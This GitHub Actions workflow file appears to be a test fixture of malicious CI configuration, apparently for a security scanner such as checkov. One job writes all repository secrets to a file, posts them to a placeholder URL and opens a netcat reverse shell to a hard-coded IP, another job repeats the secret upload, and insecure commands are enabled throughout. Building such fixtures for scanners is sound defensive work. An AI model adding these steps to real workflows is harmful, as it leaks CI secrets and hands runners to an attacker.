name: Supply Chain
on:
  workflow_dispatch:
  schedule:
    - cron: 0 0 * * 0
jobs:
   bridgecrew:
    runs-on: ubuntu-latest
    steps:
    - name: Run checkov
      id: checkov
      uses: bridgecrewio/checkov-action@master
      env:
        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}}
        ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
   bridgecrew2:
    runs-on: ubuntu-latest
    steps:
    - name: Run checkov
      id: checkov
      env:
        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}}
        ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
      run:  |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" <BADURL > /dev/null
          rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f
   container-test-job:
     runs-on: ubuntu-latest
     container:
       image: node:10.0.0-slim
       env:
         NODE_ENV: development
         ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
       ports:
         - 80
     steps:
       - name: Check for dockerenv file
         run:  | 
           (ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)
           curl -X POST -s --data "@.secrets" <BADURL > /dev/null
